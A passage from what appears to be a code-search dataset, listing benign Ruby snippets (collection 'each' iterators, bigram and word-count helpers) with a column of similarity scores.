end\nend",
"def each\n end",
"def each\n nodo1 = @lista_alimentos.head\n nodo2 = @gramos.head\n while (nodo1 != nil && nodo2 != nil)\n yield nodo1.value\n nodo1 = nodo1.next\n nodo2 = nodo2.next\n end\n end",
"def each\n all.each do |el|\n yield el\n end\n end",
"def each\n yield self\n children.each {|c| c.each {|n| yield n}}\n end",
"def each &block\n #els = elements.map{|e| Builder.new(singular_r_name, e).build}\n return elements.to_enum if !block_given?\n for element in elements\n block.call(element)\n end\n end",
"def each_mRNA\n parse if !@mrnalist\n each_item(@mrnalist) { |id, recs, component | yield id, recs, component }\n end",
"def each\n all.each do |el|\n yield el\n end\n end",
"def each_queue\n @cache.each do |queue|\n yield queue\n end\n end",
"def each\n items.each { |itm| yield itm }\n end",
"def each # And define each on top of next\n loop { yield self.next }\n end",
"def anagrams_for(word, array)\n array.find_all {|element| are_anagrams?(word, element)}\nend",
"def each\n self.to_hash.each\n end",
"def each &block\n db.iterinit\n loop do\n key = db.iternext or break\n val = db[key]\n yield key, val\n end\n end",
"def pangram_search(words, &block)\n # Bust out if we've found enough pangrams\n raise AllDone.new if @max_count != 0 && @count > @max_count\n \n h = LetterHistogram.new words\n\n # If we already have more words or more repeats, then no need to look any\n # further, we should backtrack and try something else.\n return if words.size >= @min_size && h.repeats >= @min_repeats\n\n # This pangram is somehow minimal, so pass to the block\n if h.pangram?\n @min_size = words.size if words.size < @min_size\n @min_repeats = h.repeats if h.repeats < @min_repeats\n @count += 1\n yield words,h\n return\n end\n\n # No pangram yet, find children and descend\n new_words = @word_letters.least_common words,h\n new_words.each {|w| pangram_search words + [w], &block}\n end",
"def each(&block)\n @all.each_batch { |batch| batch.each { |s| yield s } }\n end",
"def each\n songs.each do |song|\n yield song\n end\n end",
"def all_matches\n b = GenerateBets.new(1, 1, 40)\n # ap b.generate_sameple\n return b.generate_sameple\n # return b.example_feed\n end",
"def each()\n i = 0\n while i < @total\n yield at(i)\n i += 1\n end\n self\n end",
"def use_bigram(str,i)\n\t\tmax=@han[str[i]][0]\n\t\tif i==0\n\t\t\t@han[str[i]].each{|h|\n\t\t\t\tif ref(\"$\"+h)>ref(\"$\"+max)\n\t\t\t\t\tmax=h\n\t\t\t\tend\n\n\t\t\t}\n\t\telse\n\t\t\t\t@han[str[i]].each{|h|\n\t\t\t\tif ref(str[i-1]+h)>ref(str[i-1]+max)\n\t\t\t\t\tmax=h\n\t\t\t\tend\n\n\t\t\t}\n\t\tend\n\t\treturn max\n\n\tend",
"def each\n (bytesize * 8).times do |pos|\n yield self[pos]\n end\n end",
"def each\n [@lval,@rval,@operator].each { |child| yield child }\n end"
] | [
"0.6529484",
"0.6284862",
"0.58925784",
"0.55048925",
"0.55033886",
"0.5483166",
"0.547559",
"0.54718196",
"0.53993124",
"0.53735304",
"0.53317696",
"0.5310152",
"0.5298479",
"0.52913725",
"0.5232824",
"0.52292114",
"0.522671",
"0.5221761",
"0.5211718",
"0.52070147",
"0.51845556",
"0.5179349",
"0.5127128",
"0.51222265",
"0.50948095",
"0.50915277",
"0.50751865",
"0.50751865",
"0.50751865",
"0.50332475",
"0.503241",
"0.50067306",
"0.5002444",
"0.49993286",
"0.49829108",
"0.4976749",
"0.49679387",
"0.49608693",
"0.49605483",
"0.49588877",
"0.49563065",
"0.49500075",
"0.49500075",
"0.49500075",
"0.49500075",
"0.49500075",
"0.49500075",
"0.49493787",
"0.49259007",
"0.49088064",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49082088",
"0.49064243",
"0.49029568",
"0.48929235",
"0.4889658",
"0.48741567",
"0.4871623",
"0.48605525",
"0.485688",
"0.48567164",
"0.4854834",
"0.4849848",
"0.48462775",
"0.4843884",
"0.48434535",
"0.48411348",
"0.48389992",
"0.48382616",
"0.48358202",
"0.48291433",
"0.48233217",
"0.48197612",
"0.48180306",
"0.48160335",
"0.48145413",
"0.48109147",
"0.48005044",
"0.4796155",
"0.47922522",
"0.47894582",
"0.47867823",
"0.4784441",
"0.47742182",
"0.47639182",
"0.47549838",
"0.475484",
"0.47407192",
"0.47367135",
"0.4736221",
"0.47349092"
] | 0.7697235 | 0 |
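A minimal, self-contained usage sketch for the `each` document in the record above, added for illustration: `BigramTable`, its `add` helper, and the `Bigram` struct are assumptions made for the demo, not identifiers taken from this dataset; only the body of `each` mirrors the record.

Bigram = Struct.new(:word1, :word2, :count)

class BigramTable
  include Enumerable  # defining `each` below unlocks map/select/sum, etc.

  def initialize
    @table = {}  # [word1, word2] => Bigram, as in the record above
  end

  def add(w1, w2)
    bigram = (@table[[w1, w2]] ||= Bigram.new(w1, w2, 0))
    bigram.count += 1
  end

  # Same shape as the record's document: ignore the pair key, yield the Bigram.
  def each
    @table.each do |pair, bigram|
      yield(bigram)
    end
  end
end

table = BigramTable.new
table.add("the", "cat")
table.add("the", "cat")
table.add("cat", "sat")
table.each { |b| puts "#{b.word1} #{b.word2}: #{b.count}" }
# => the cat: 2
#    cat sat: 1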
Total number of bigram occurrences, i.e. the sum of each Bigram's count. | def total
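# Sum Bigram#count across all entries, memoized in @total after the first call.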
@total ||= (
tally = 0
each do |b|
tally += b.count
end
tally
)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def total_grams\n data[:total_grams]\n end",
"def lexigram_counter(sequencetext)\n @sequencetext = sequencetext\n\t@lexigrams = lexigram_searcher(@sequencetext)\n\tif (@lexigrams === [\"no letters remain after processing\"])\n\t @lexigrams_count = 0\n else\n @lexigrams_count = @lexigrams.count.to_s\n end\n end",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
"def gramos\r\n grams = 0\r\n @lista_alimentos.each do |i|\r\n grams += 100\r\n end\r\n return grams\r\n end",
"def total_words\n words.size\n end",
"def trigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word_1 = \"\"\n\t prev_word_2 = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word_1 != \"\" && prev_word_2 != \"\")\n\t\t @trifreq[prev_word_1 + \" \" + prev_word_2 + \" \" + word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 != \"\")\n\t\t @trifreq[\"PHI \"+prev_word_2+\" \"+word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 == \"\")\n\t\t @trifreq[\"PHI PHI \"+word] += 1\t\n\t\tend \t \t\n\t\tprev_word_1 = prev_word_2 \n\t\tprev_word_2 = word\n\t }\n\t}\n end",
"def count\n self.wordcounts.map(&:count).inject(0, :+)\n end",
"def grams\n gram_equivalent / amount\n end",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def gramos_total\n\t\tsuma = 0\n\t\t\n\t\t@gramos.each do |i|\n\t\t\tsuma += i\n\t\tend\n\n\t\treturn suma.round(2)\n\tend",
"def word_count\n @tried_solutions.length\n end",
"def size\n @gens.size\n end",
"def size\n @gens.size\n end",
"def totalGramos\n\t\tgramos = 0\n\t\ttotal = 0\n\t\t@platos.each do |alimento|\n\t\t\tgramos += alimento.gramos\n\t\tend\n\t\treturn gramos.round(2)\n\tend",
"def sentence_count\n weighted(:count, :sentence).to_i\n end",
"def length()\n return @letter_bag.length\n end",
"def num_matching(one_bigrams, two_bigrams, acc = 0)\n return acc if one_bigrams.empty? || two_bigrams.empty?\n\n one_two = one_bigrams.index(two_bigrams[0])\n two_one = two_bigrams.index(one_bigrams[0])\n\n if one_two.nil? && two_one.nil?\n num_matching(one_bigrams.drop(1), two_bigrams.drop(1), acc)\n else\n # If one is nil, it is set to the other\n two_one ||= one_two\n one_two ||= two_one\n\n if one_two < two_one\n num_matching(one_bigrams.drop(one_two + 1),\n two_bigrams.drop(1), acc + 1)\n else\n num_matching(one_bigrams.drop(1),\n two_bigrams.drop(two_one + 1), acc + 1)\n end\n end\n end",
"def word_count\n weighted(:count, :word).to_i\n end",
"def num_bases\n self.map { |chr,n| n }.sum\n end",
"def word_count\n @@word_count\n end",
"def grams_per_skein\n data[:grams_per_skein]\n end",
"def word_count\n return words.size\n end",
"def mb_count()\n each_char.map{|c| c.bytesize == 1 ? 1 : 2}.reduce(0, &:+)\n end",
"def calculate_word_count\n 0x0A\n end",
"def total_word_count\n @_total_word_count ||= words.values.reduce(:+)\n end",
"def word_count\n words.size\n end",
"def word_count\n words.size\n end",
"def word_number\n text.split.size\n end",
"def count\n @letters.length\n end",
"def total_sentences\n @string.split(/\\.+/).size\n end",
"def word_sizes(text)\n word_size = Hash.new(0)\n words = text.split\n words.each { |word| word_size[word.size] += 1 }\n word_size\nend",
"def length\n @gens.length\n end",
"def length\n @gens.length\n end",
"def num_sentences\n @sentences.length\n end",
"def adword_count_total(page)\n\t\tadword_count_top(page) + adword_count_right(page)\n\tend",
"def num_words\n @words.length\n end",
"def number_word_char_count\n (1..1000).map(&:english_word).join.count_chars\nend",
"def calculate_word_count\n 0x0C\n end",
"def count\n @words.length\n end",
"def wordCount\n count = 0\n\n if (@word.to_s != '')\n count += 1\n end\n\n if @children.size\n @children.each do |key, val|\n count += val.wordCount\n end\n end\n\n count\n end",
"def ngrams_sum(ngrams)\n ngrams.map { |i| freq[i] }.inject(&:+) || 0\n end",
"def test_size\n @results.map {|node_name, classes|\n classes.size\n }.reduce(:+) || 0\n end",
"def size\n @words.size\n end",
"def num_words(size)\n total = 0\n @word_list.each{ |word| total += 1 if word.size == size }\n total\n end",
"def count_tokens()\n @counts = Hash.new(0)\n @tokens.each do |token|\n @counts[token] += 1\n end\n @counts\n end",
"def total_review_word_count\n review_word_counts.inject(:+)\n end",
"def count(gram)\n @dirty = true\n\n unless @frequencies.has_key?(gram)\n @frequencies[gram] = 0\n end\n\n return @frequencies[gram] += 1\n end",
"def number_of_unique_words\n @frequencies.keys.length\n end",
"def generate_counts(data)\n counts = {}\n data.each do |line|\n unigram = nil\n bigram = nil\n trigram = nil\n\n # prepend buffering ghost values so we can represent trigrams of the first word\n tokens = line.split(' ')\n\n # take a sliding window of the entire line, generating grams as we go\n (1..(tokens.size-1)).to_a.each do |i|\n unigram = tokens[i..i]\n bigram = tokens[i-1..i]\n trigram = tokens[i-2..i]\n\n counts.store(unigram, counts.fetch(unigram, 0) + 1)\n counts.store(bigram, counts.fetch(bigram, 0) + 1)\n counts.store(trigram, counts.fetch(trigram, 0) + 1)\n end\n end\n counts\nend",
"def phraseLength\n\t\treturn @dictionaries.length\n\tend",
"def n_gramas\n for i in 2...8\n busca_n_gramas(i)\n end\n end",
"def total_num_assignment_teams\n assignment_team_counts.inject(:+)\n end",
"def num_rounds\n (Math.log(teams.size) / Math.log(2)).to_i\n end",
"def word_sizes(text)\n word_size = Hash.new(0)\n text.split.map do |word|\n word.delete \"^A-Za-z\"\n word_size[word.size] += 1\n end\n word_size\nend",
"def word_count_total(text, unique: false)\n unique ? unique_words(text).length : normalize(text).length\nend",
"def full_bigram_counts\n {\n'TH' => 116997844,\n'HE' => 100689263,\n'IN' => 87674002,\n'ER' => 77134382,\n'AN' => 69775179,\n'RE' => 60923600,\n'ES' => 57070453,\n'ON' => 56915252,\n'ST' => 54018399,\n'NT' => 50701084,\n'EN' => 48991276,\n'AT' => 48274564,\n'ED' => 46647960,\n'ND' => 46194306,\n'TO' => 46115188,\n'OR' => 45725191,\n'EA' => 43329810,\n'TI' => 42888666,\n'AR' => 42353262,\n'TE' => 42295813,\n'NG' => 38567365,\n'AL' => 38211584,\n'IT' => 37938534,\n'AS' => 37773878,\n'IS' => 37349981,\n'HA' => 35971841,\n'ET' => 32872552,\n'SE' => 31532272,\n'OU' => 31112284,\n'OF' => 30540904,\n'LE' => 30383262,\n'SA' => 30080131,\n'VE' => 29320973,\n'RO' => 29230770,\n'RA' => 28645577,\n'RI' => 27634643,\n'HI' => 27495342,\n'NE' => 27331675,\n'ME' => 27237733,\n'DE' => 27029835,\n'CO' => 26737101,\n'TA' => 26147593,\n'EC' => 25775798,\n'SI' => 25758841,\n'LL' => 24636875,\n'SO' => 23903631,\n'NA' => 23547524,\n'LI' => 23291169,\n'LA' => 23178317,\n'EL' => 23092248,\n'MA' => 21828378,\n'DI' => 21673998,\n'IC' => 21468412,\n'RT' => 21456059,\n'NS' => 21306421,\n'RS' => 21237259,\n'IO' => 21210160,\n'OM' => 21066156,\n'CH' => 20132750,\n'OT' => 20088048,\n'CA' => 19930754,\n'CE' => 19803619,\n'HO' => 19729026,\n'BE' => 19468489,\n'TT' => 19367472,\n'FO' => 18923772,\n'TS' => 18922522,\n'SS' => 18915696,\n'NO' => 18894111,\n'EE' => 18497942,\n'EM' => 18145294,\n'AC' => 17904683,\n'IL' => 17877600,\n'DA' => 17584055,\n'NI' => 17452104,\n'UR' => 17341717,\n'WA' => 16838794,\n'SH' => 16773127,\n'EI' => 16026915,\n'AM' => 15975981,\n'TR' => 15821226,\n'DT' => 15759673,\n'US' => 15699353,\n'LO' => 15596310,\n'PE' => 15573318,\n'UN' => 15237699,\n'NC' => 15214623,\n'WI' => 15213018,\n'UT' => 15137169,\n'AD' => 14877234,\n'EW' => 14776406,\n'OW' => 14610429,\n'GE' => 14425023,\n'EP' => 14024377,\n'AI' => 13974919,\n'LY' => 13742031,\n'OL' => 13726491,\n'FT' => 13696078,\n'OS' => 13596265,\n'EO' => 13524186,\n'EF' => 13252227,\n'PR' => 13191182,\n'WE' => 13185116,\n'DO' => 13120322,\n'MO' => 12950768,\n'ID' => 12896787,\n'IE' => 12505546,\n'MI' => 12168944,\n'PA' => 12068709,\n'FI' => 11993833,\n'PO' => 11917535,\n'CT' => 11888752,\n'WH' => 11852909,\n'IR' => 11681353,\n'AY' => 11523416,\n'GA' => 11239788,\n'SC' => 10800636,\n'KE' => 10650670,\n'EV' => 10574011,\n'SP' => 10570626,\n'IM' => 10544422,\n'OP' => 10459455,\n'DS' => 10429887,\n'LD' => 10245579,\n'UL' => 10173468,\n'OO' => 10168856,\n'SU' => 10031005,\n'IA' => 10002012,\n'GH' => 9880399,\n'PL' => 9812226,\n'EB' => 9738798,\n'IG' => 9530574,\n'VI' => 9380037,\n'IV' => 9129232,\n'WO' => 9106647,\n'YO' => 9088497,\n'RD' => 9025637,\n'TW' => 8910254,\n'BA' => 8867461,\n'AG' => 8809266,\n'RY' => 8788539,\n'AB' => 8775582,\n'LS' => 8675452,\n'SW' => 8673234,\n'AP' => 8553911,\n'FE' => 8529289,\n'TU' => 8477495,\n'CI' => 8446084,\n'FA' => 8357929,\n'HT' => 8351551,\n'FR' => 8339376,\n'AV' => 8288885,\n'EG' => 8286463,\n'GO' => 8188708,\n'BO' => 8172395,\n'BU' => 8113271,\n'TY' => 8008918,\n'MP' => 7835172,\n'OC' => 7646952,\n'OD' => 7610214,\n'EH' => 7559141,\n'YS' => 7539621,\n'EY' => 7528342,\n'RM' => 7377989,\n'OV' => 7350014,\n'GT' => 7347990,\n'YA' => 7239548,\n'CK' => 7205091,\n'GI' => 7103140,\n'RN' => 7064635,\n'GR' => 6989963,\n'RC' => 6974063,\n'BL' => 6941044,\n'LT' => 6817273,\n'YT' => 6714151,\n'OA' => 6554221,\n'YE' => 6499305,\n'OB' => 6212512,\n'DB' => 6106719,\n'FF' => 6085519,\n'SF' => 6073995,\n'RR' => 5896212,\n'DU' => 5861311,\n'KI' => 5814357,\n'UC' => 5742385,\n'IF' => 5740414,\n'AF' => 5702567,\n'DR' => 5701879,\n'CL' => 
5683204,\n'EX' => 5649363,\n'SM' => 5580755,\n'PI' => 5559210,\n'SB' => 5553684,\n'CR' => 5514347,\n'TL' => 5403137,\n'OI' => 5336616,\n'RU' => 5330557,\n'UP' => 5306948,\n'BY' => 5232074,\n'TC' => 5196817,\n'NN' => 5180899,\n'AK' => 5137311,\n'SL' => 4965012,\n'NF' => 4950333,\n'UE' => 4927837,\n'DW' => 4906814,\n'AU' => 4884168,\n'PP' => 4873393,\n'UG' => 4832325,\n'RL' => 4803246,\n'RG' => 4645938,\n'BR' => 4621080,\n'CU' => 4604045,\n'UA' => 4589997,\n'DH' => 4585765,\n'RK' => 4491400,\n'YI' => 4461214,\n'LU' => 4402940,\n'UM' => 4389720,\n'BI' => 4356462,\n'NY' => 4343290,\n'NW' => 4215967,\n'QU' => 4169424,\n'OG' => 4163126,\n'SN' => 4157990,\n'MB' => 4121764,\n'VA' => 4111375,\n'DF' => 4033878,\n'DD' => 4001275,\n'MS' => 3922855,\n'GS' => 3920675,\n'AW' => 3918960,\n'NH' => 3915410,\n'PU' => 3858148,\n'HR' => 3843001,\n'SD' => 3842250,\n'TB' => 3815459,\n'PT' => 3812475,\n'NM' => 3796928,\n'DC' => 3782481,\n'GU' => 3768430,\n'TM' => 3759861,\n'MU' => 3755834,\n'NU' => 3732602,\n'MM' => 3730508,\n'NL' => 3692985,\n'EU' => 3674130,\n'WN' => 3649615,\n'NB' => 3602692,\n'RP' => 3588188,\n'DM' => 3544905,\n'SR' => 3513808,\n'UD' => 3499535,\n'UI' => 3481482,\n'RF' => 3436232,\n'OK' => 3397570,\n'YW' => 3379064,\n'TF' => 3368452,\n'IP' => 3348621,\n'RW' => 3348005,\n'RB' => 3346212,\n'OH' => 3254659,\n'KS' => 3227333,\n'DP' => 3145043,\n'FU' => 3138900,\n'YC' => 3128053,\n'TP' => 3070427,\n'MT' => 3055946,\n'DL' => 3050945,\n'NK' => 3043200,\n'CC' => 3026492,\n'UB' => 2990868,\n'RH' => 2968706,\n'NP' => 2968126,\n'JU' => 2924815,\n'FL' => 2890839,\n'DN' => 2840522,\n'KA' => 2833038,\n'PH' => 2825344,\n'HU' => 2771830,\n'JO' => 2721345,\n'LF' => 2702522,\n'YB' => 2696786,\n'RV' => 2692445,\n'OE' => 2616308,\n'IB' => 2598444,\n'IK' => 2585124,\n'YP' => 2581863,\n'GL' => 2576787,\n'LP' => 2543957,\n'YM' => 2516273,\n'LB' => 2463693,\n'HS' => 2462026,\n'DG' => 2442139,\n'GN' => 2426429,\n'EK' => 2411639,\n'NR' => 2393580,\n'PS' => 2377036,\n'TD' => 2346516,\n'LC' => 2328063,\n'SK' => 2321888,\n'YF' => 2305244,\n'YH' => 2291273,\n'VO' => 2253292,\n'AH' => 2225270,\n'DY' => 2218040,\n'LM' => 2216514,\n'SY' => 2214270,\n'NV' => 2194534,\n'YD' => 2122337,\n'FS' => 2047416,\n'SG' => 2043770,\n'YR' => 2021939,\n'YL' => 2013939,\n'WS' => 1988727,\n'MY' => 1949129,\n'OY' => 1932892,\n'KN' => 1903836,\n'IZ' => 1865802,\n'XP' => 1840696,\n'LW' => 1836811,\n'TN' => 1782119,\n'KO' => 1758001,\n'AA' => 1721143,\n'JA' => 1712763,\n'ZE' => 1709871,\n'FC' => 1570791,\n'GW' => 1567991,\n'TG' => 1530045,\n'XT' => 1509969,\n'FH' => 1507604,\n'LR' => 1505092,\n'JE' => 1487348,\n'YN' => 1485655,\n'GG' => 1468286,\n'GF' => 1465290,\n'EQ' => 1461436,\n'HY' => 1446451,\n'KT' => 1443985,\n'HC' => 1441057,\n'BS' => 1409672,\n'HW' => 1403223,\n'HN' => 1383958,\n'CS' => 1381608,\n'HM' => 1353001,\n'NJ' => 1342735,\n'HH' => 1329998,\n'WT' => 1301293,\n'GC' => 1299541,\n'LH' => 1274048,\n'EJ' => 1256993,\n'FM' => 1251312,\n'DV' => 1238565,\n'LV' => 1238287,\n'WR' => 1226755,\n'GP' => 1215204,\n'FP' => 1199845,\n'GB' => 1184377,\n'GM' => 1178511,\n'HL' => 1169468,\n'LK' => 1164186,\n'CY' => 1145316,\n'MC' => 1101727,\n'YG' => 1049082,\n'XI' => 1024736,\n'HB' => 1014004,\n'FW' => 1005903,\n'GY' => 979804,\n'HP' => 978649,\n'MW' => 937621,\n'PM' => 931225,\n'ZA' => 929119,\n'LG' => 926472,\n'IW' => 922059,\n'XA' => 904148,\n'FB' => 888155,\n'SV' => 882083,\n'GD' => 879792,\n'IX' => 879360,\n'AJ' => 870262,\n'KL' => 846309,\n'HF' => 834284,\n'HD' => 828755,\n'AE' => 815963,\n'SQ' => 800346,\n'DJ' => 799366,\n'FY' => 
789961,\n'AZ' => 768359,\n'LN' => 752316,\n'AO' => 749566,\n'FD' => 748027,\n'KW' => 719633,\n'MF' => 715087,\n'MH' => 710864,\n'SJ' => 704442,\n'UF' => 701892,\n'TV' => 698150,\n'XC' => 697995,\n'YU' => 695512,\n'BB' => 689158,\n'WW' => 674610,\n'OJ' => 661082,\n'AX' => 660826,\n'MR' => 660619,\n'WL' => 657782,\n'XE' => 653947,\n'KH' => 650095,\n'OX' => 650078,\n'UO' => 649906,\n'ZI' => 644035,\n'FG' => 637758,\n'IH' => 610683,\n'TK' => 610333,\n'II' => 607124,\n'IU' => 576683,\n'TJ' => 559473,\n'MN' => 558397,\n'WY' => 553647,\n'KY' => 553296,\n'KF' => 537342,\n'FN' => 534362,\n'UY' => 531960,\n'PW' => 530411,\n'DK' => 525744,\n'RJ' => 518157,\n'UK' => 514873,\n'KR' => 507020,\n'KU' => 506618,\n'WM' => 505687,\n'KM' => 485617,\n'MD' => 481126,\n'ML' => 478528,\n'EZ' => 465466,\n'KB' => 457860,\n'WC' => 448394,\n'WD' => 432646,\n'HG' => 429607,\n'BT' => 428276,\n'ZO' => 424016,\n'KC' => 420017,\n'PF' => 418168,\n'YV' => 411487,\n'PC' => 400308,\n'PY' => 396147,\n'WB' => 394820,\n'YK' => 391953,\n'CP' => 382923,\n'YJ' => 378679,\n'KP' => 375653,\n'PB' => 369336,\n'CD' => 358435,\n'JI' => 357577,\n'UW' => 352732,\n'UH' => 339341,\n'WF' => 336213,\n'YY' => 332973,\n'WP' => 321746,\n'BC' => 320380,\n'AQ' => 315068,\n'CB' => 298053,\n'IQ' => 291635,\n'CM' => 285942,\n'MG' => 285133,\n'DQ' => 283314,\n'BJ' => 282608,\n'TZ' => 280007,\n'KD' => 277982,\n'PD' => 273162,\n'FJ' => 269865,\n'CF' => 267630,\n'NZ' => 266461,\n'CW' => 257253,\n'FV' => 244685,\n'VY' => 233082,\n'FK' => 228905,\n'OZ' => 228556,\n'ZZ' => 221275,\n'IJ' => 219128,\n'LJ' => 218362,\n'NQ' => 217422,\n'UV' => 212051,\n'XO' => 211173,\n'PG' => 211133,\n'HK' => 210385,\n'KG' => 209266,\n'VS' => 204093,\n'HV' => 197539,\n'BM' => 191807,\n'HJ' => 189906,\n'CN' => 188046,\n'GV' => 186777,\n'CG' => 181590,\n'WU' => 180884,\n'GJ' => 176947,\n'XH' => 166599,\n'GK' => 163830,\n'TQ' => 159111,\n'CQ' => 157546,\n'RQ' => 156933,\n'BH' => 154489,\n'XS' => 154347,\n'UZ' => 153736,\n'WK' => 148964,\n'XU' => 147533,\n'UX' => 144814,\n'BD' => 141752,\n'BW' => 140189,\n'WG' => 139890,\n'MV' => 136314,\n'MJ' => 134263,\n'PN' => 131645,\n'XM' => 127492,\n'OQ' => 122677,\n'BV' => 120081,\n'XW' => 119322,\n'KK' => 118811,\n'BP' => 115161,\n'ZU' => 113538,\n'RZ' => 113432,\n'XF' => 113031,\n'MK' => 111041,\n'ZH' => 107639,\n'BN' => 106125,\n'ZY' => 105871,\n'HQ' => 101241,\n'WJ' => 99435,\n'IY' => 98361,\n'DZ' => 98038,\n'VR' => 96416,\n'ZS' => 94993,\n'XY' => 94329,\n'CV' => 94224,\n'XB' => 94041,\n'XR' => 90046,\n'UJ' => 88168,\n'YQ' => 87953,\n'VD' => 85611,\n'PK' => 83017,\n'VU' => 82830,\n'JR' => 80471,\n'ZL' => 80039,\n'SZ' => 79840,\n'YZ' => 78281,\n'LQ' => 77148,\n'KJ' => 76816,\n'BF' => 75352,\n'NX' => 74844,\n'QA' => 73527,\n'QI' => 73387,\n'KV' => 73184,\n'ZW' => 68865,\n'WV' => 63930,\n'UU' => 63043,\n'VT' => 62912,\n'VP' => 62577,\n'XD' => 60101,\n'GQ' => 59750,\n'XL' => 59585,\n'VC' => 59024,\n'CZ' => 57914,\n'LZ' => 57314,\n'ZT' => 56955,\n'WZ' => 52836,\n'SX' => 50975,\n'ZB' => 50652,\n'VL' => 49032,\n'PV' => 48105,\n'FQ' => 47504,\n'PJ' => 47043,\n'ZM' => 46034,\n'VW' => 45608,\n'CJ' => 41526,\n'ZC' => 41037,\n'BG' => 40516,\n'JS' => 39326,\n'XG' => 39289,\n'RX' => 38654,\n'HZ' => 37066,\n'XX' => 35052,\n'VM' => 35024,\n'XN' => 34734,\n'QW' => 34669,\n'JP' => 34520,\n'VN' => 33082,\n'ZD' => 32906,\n'ZR' => 32685,\n'FZ' => 31186,\n'XV' => 31117,\n'ZP' => 30389,\n'VH' => 30203,\n'VB' => 29192,\n'ZF' => 28658,\n'GZ' => 28514,\n'TX' => 28156,\n'VF' => 28090,\n'DX' => 27413,\n'QB' => 27307,\n'BK' => 26993,\n'ZG' => 26369,\n'VG' => 
25585,\n'JC' => 24770,\n'ZK' => 24262,\n'ZN' => 24241,\n'UQ' => 23386,\n'JM' => 22338,\n'VV' => 22329,\n'JD' => 21903,\n'MQ' => 21358,\n'JH' => 20960,\n'QS' => 20847,\n'JT' => 20408,\n'JB' => 19380,\n'FX' => 19313,\n'PQ' => 18607,\n'MZ' => 18271,\n'YX' => 16945,\n'QT' => 16914,\n'WQ' => 16245,\n'JJ' => 16085,\n'JW' => 16083,\n'LX' => 15467,\n'GX' => 14778,\n'JN' => 14452,\n'ZV' => 14339,\n'MX' => 14250,\n'JK' => 13967,\n'KQ' => 13905,\n'XK' => 13651,\n'JF' => 12640,\n'QM' => 12315,\n'QH' => 12273,\n'JL' => 12149,\n'JG' => 12023,\n'VK' => 11469,\n'VJ' => 11432,\n'KZ' => 11192,\n'QC' => 10667,\n'XJ' => 10629,\n'PZ' => 9697,\n'QL' => 9603,\n'QO' => 9394,\n'JV' => 8925,\n'QF' => 8778,\n'QD' => 8678,\n'BZ' => 8132,\n'HX' => 7526,\n'ZJ' => 7167,\n'PX' => 6814,\n'QP' => 6062,\n'QE' => 6020,\n'QR' => 5975,\n'ZQ' => 5773,\n'JY' => 5723,\n'BQ' => 5513,\n'XQ' => 5416,\n'CX' => 5300,\n'KX' => 5083,\n'WX' => 4678,\n'QY' => 4557,\n'QV' => 4212,\n'QN' => 3808,\n'VX' => 3192,\n'BX' => 3021,\n'JZ' => 2859,\n'VZ' => 2633,\n'QG' => 2567,\n'QQ' => 2499,\n'ZX' => 2463,\n'XZ' => 2082,\n'QK' => 2023,\n'VQ' => 1488,\n'QJ' => 1342,\n'QX' => 765,\n'JX' => 747,\n'JQ' => 722,\n'QZ' => 280\n}\n end",
"def word_sizes(sentence)\n hash = Hash.new(0)\n sentence.split.each do |word|\n hash[word.size] += 1\n end\n hash\nend",
"def word_sizes(words)\n count_hash = Hash.new(0)\n words.split.each do |word|\n count_hash[word.size] += 1\n end\n p count_hash\nend",
"def word_sizes(sentence)\n words = Hash.new(0)\n sentence.split.each {|x| words[x.count(\"A-Za-z\")] += 1}\n words\nend",
"def grams\n @frequencies.keys\n end",
"def get_total_games_played\n\t\treturn games.size\n\tend",
"def number_of_chars\n text.to_s.number_of_chars\n end",
"def word_sizes(sentence)\n cleaned = sentence.gsub(/[^0-9a-z]/i, ' ')\n grouped = cleaned.split.group_by {|x| x.length }\n results = grouped.each {|x, i| grouped[x] = i.length}\n end",
"def get_total_games_played\n return games.size\n end",
"def word_sizes(string)\n string.split.map do |word|\n word.size\n end.tally\n \nend",
"def words_per_sentence\n @words.length.to_f / @sentences.length.to_f\n end",
"def numWords\n @words\n end",
"def number_letter_count(n)\n\ttotal = 0\n\tn.times do |i|\n\t\t# puts wordify(i+1) # uncomment if you want to print out the numbers\n\t\ttotal += word_number_length(i+1)\n\tend\n\treturn total\nend",
"def word_sizes(string)\n string.split.map { |word| word.size }.tally\nend",
"def word_sizes(sentence)\n sentence.split.each_with_object(Hash.new(0)) { |word, obj| obj[word.size] += 1 } \nend",
"def number_of_tokens\r\n return MONOPOLY_GAME[:tokens].count\r\nend",
"def get_raw_counts phrase, ngram_model=0, separator=\" \"\n ngram_model_inferred = ngram_model==0 ? phrase.split(separator).count : ngram_model\n return @ngram_counts[ngram_model_inferred][phrase]\n end",
"def length\n @tokens.length\n end",
"def how_many\n return @@total_samurais\n end",
"def total_pages\n\t\t\t\treturn 0 if @total_results == 0\n\t\t\t\t(@total_results.to_f / BATCH_SIZE).ceil\n\t\t\tend",
"def total_rounds\n matches_per_round = users.count / 2\n total_matches = (users.count - 1) * matches_per_round\n total_rounds = total_matches / matches_per_round\n\n total_rounds\n end",
"def total_score\n total_score = 0\n plays.each do |word|\n total_score += Scrabble::Scoring.score(word)\n end\n return total_score\n end",
